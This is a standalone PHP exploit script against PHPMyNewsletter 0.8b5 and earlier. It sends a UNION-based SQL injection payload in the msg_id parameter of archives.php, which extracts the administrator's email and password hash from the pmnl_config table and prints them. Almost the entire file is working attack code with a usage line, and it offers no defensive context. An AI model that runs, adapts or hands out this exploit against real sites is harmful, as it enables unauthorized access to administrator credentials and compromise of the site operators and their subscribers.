#!/usr/bin/php * Date: 03-10-08 * Conditions: magic_quotes_gpc=Off * * This exploit gets admin_pass and admin_email from pmnl_config. */ print "\n"; print " PHPMyNewsletter <= 0.8b5 SQL Injection\n"; print " by real \n\n"; if($argc<2) die("usage: php phpmynewsletter_sql.php \n"); $url = $argv[1]; $c = get($url."archives.php?msg_id='%20UNION%20SELECT%201,1,admin_email,admin_pass%20%20FROM%20pmnl_config%2f%2a&list_id=1"); if(preg_match("#
(.+) - 0000-00-00 00:00:00
#i",$c,$a) && preg_match("#
\t([a-f0-9]{32})
#i",$c,$b)) { print "[*] Mail:\t$a[1]\n"; print "[*] Password:\t$b[1]\n"; } else { print "[*] Exploit failed\n"; } function get($url,$get=1) { $result = ''; preg_match("#^http://([^/]+)(/.*)$#i",$url,$infos); $host = $infos[1]; $page = $infos[2]; $fp = fsockopen($host, 80, &$errno, &$errstr, 30); $req = "GET $page HTTP/1.1\r\n"; $req .= "Host: $host\r\n"; $req .= "User-Agent: Mozilla Firefox\r\n"; $req .= "Connection: close\r\n\r\n"; fputs($fp,$req); if($get) while(!feof($fp)) $result .= fgets($fp,128); fclose($fp); return $result; } ?>